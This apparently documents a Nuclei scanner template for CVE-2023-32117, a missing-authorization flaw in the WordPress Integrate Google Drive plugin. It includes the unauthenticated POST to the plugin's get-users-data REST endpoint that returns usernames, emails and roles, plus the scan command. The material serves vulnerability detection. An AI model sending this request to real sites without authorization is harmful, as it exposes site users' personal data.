Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints
ID: CVE-2023-32117
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive
Description
Section titled “Description”The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.
YAML Source
Section titled “YAML Source”id: CVE-2023-32117
info: name: Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints author: DhiyaneshDK severity: high description: | The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. impact: | Unauthenticated attackers can access and manipulate sensitive data in Google Drive remediation: Fixed in 1.2.0 reference: - https://github.com/RandomRobbieBF/CVE-2023-32117 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2023-32117 cpe: cpe:2.3:a:softlabbd:integrate_google_drive:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/integrate-google-drive/" product: integrate_google_drive vendor: softlabbd tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive
http: - method: POST path: - "{{BaseURL}}/wp-json/igd/v1/get-users-data"
matchers-condition: and matchers: - type: word part: body words: - '"username":' - '"name":' - '"email":' - '"role":' condition: and
- type: word part: header words: - 'application/json'
- type: status status: - 200# digest: 4a0a004730450220205783d665d9b69d63e051b793a3caf33b4d91696fe7e0d116917ab414752280022100834c70df1f018e60c69da25c6c50c7e3744154ef4034a18346b2bebe8eb13199:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32117.yaml"